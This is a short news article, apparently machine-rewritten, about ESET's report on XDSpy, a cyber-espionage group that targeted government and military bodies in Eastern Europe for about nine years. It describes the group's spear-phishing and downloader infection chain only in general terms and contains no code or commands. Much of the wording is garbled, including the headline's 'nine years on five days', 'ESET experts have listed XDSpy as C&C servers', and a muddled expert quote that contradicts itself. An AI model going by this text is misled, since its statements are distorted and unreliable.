Hackers attacked European state structures for nine years on five days, but they were not noticed

Wednesday, October 7, 2020 – 11:50 GMT

The hacker group XDSpy, which has engaged in attacks on government institutions in Eastern Europe for several years, has been named. Quite possibly, its managers operate in almost the same location as the victims.

Have you spotted a spy?

ESET experts have conducted a report on the cyber-espionage organization XDSpy, which has targeted Eastern European countries. She somehow managed to stay unseen for nine years.

Since all the attacks it carried out used the same part called XDDown-an executable file that downloaded other malicious modules, the group was dubbed XDSpy. Victims of the movement found in Russia , Belarus, Moldova, Serbia and Ukraine are primarily government departments and military organizations, while a number of private businesses are involved.

prior to ESET’s analysis, the Belarus Cyber ​​Threat Response Center CERT.BY published a brief report on the distribution of malicious software to more than a hundred people – government officials (including several ministries), individuals and representatives of various organizations.

CERT.BY employees managed to establish one of the control servers used in the attacks. ESET experts have listed XDSpy as C&C servers.

The cyber espionage campaign went unnoticed for nine years

ESET researchers concluded, after examining the malicious code used in the attacks, the network architecture and the choice of victims, that XDSpy does not correlate with any known APT community in its activities.

We assume that offenders will work in UTC+2 or UTC+3 time zones, i.e. in the same area where their victims are situated, roughly. “We have found that they work from Monday to Friday, which suggests their job’s professional existence,” the ESET study says.

And about phishing again

The infection mechanism itself starts with spear-phishing letters containing a ZIP or RAR archive or a link to an external source from which it is suggested to be downloaded (that is, incredibly narrowly targeted). The folder contains an LNK file, which in turn uploads a script that downloads XDDown to the target device. Additional modules are then downloaded from one of the control servers via this part.

Mikhail Zaitsev, an information security specialist at SEC Consult Services, says, “The fact that XDSpy has stayed unnoticed for such a long time can already be considered peculiar today.” — This is most likely due to the fact that its operators used their own inventions predominantly (or exclusively), and not anyone else’s programming. It is not excluded because by the fact because they started to participate in mass mailing of malware, they eventually gave themselves up. The less likely they are to be identified, the more specifically targeted threats are.